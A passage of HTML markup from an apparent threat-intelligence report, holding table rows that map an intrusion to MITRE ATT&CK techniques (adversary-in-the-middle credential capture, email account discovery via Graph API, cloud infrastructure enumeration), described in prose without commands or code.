data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T</span></span><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">he adversary gained NT hashes for multiple domain accounts from cached logon information.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="56287126" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{141}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="28" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="994036821" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{45}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1052486416" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{149}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1557: Adversary-in-the-Middle</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2014088995" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{156}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T</span></span><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">he<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">adversary&#xA0; used</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>an<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">AiTM</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">proxy to capture credentials and session tokens.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1578963580" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{165}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="29" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1739158211" paraeid="{1cc28476-5781-45a4-a5b8-eaeba4e1c194}{123}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Discovery</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1149322218" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{195}" style="-webkit-user-drag: none; margin: 16px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1087.003: Account Discovery: Email Account</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="630846840" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{202}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T</span></span><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">he adversary used Graph API calls to verify long lists of email addresses and retrieve associated user GUIDs.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="623523461" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{211}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="30" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="2031767163" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{57}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1763096268" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{219}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1580: Cloud Infrastructure Discovery&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="263004115" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{226}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary performed enumeration of the environment, including gathering OneDrive metadata (drive IDs and child item counts) and user roles.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; 